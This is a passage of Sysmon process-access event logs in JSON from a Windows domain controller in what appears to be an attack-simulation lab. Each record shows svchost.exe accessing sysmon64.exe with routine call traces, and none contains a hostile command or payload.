05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5821,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5822,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5823,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5824,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5825,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 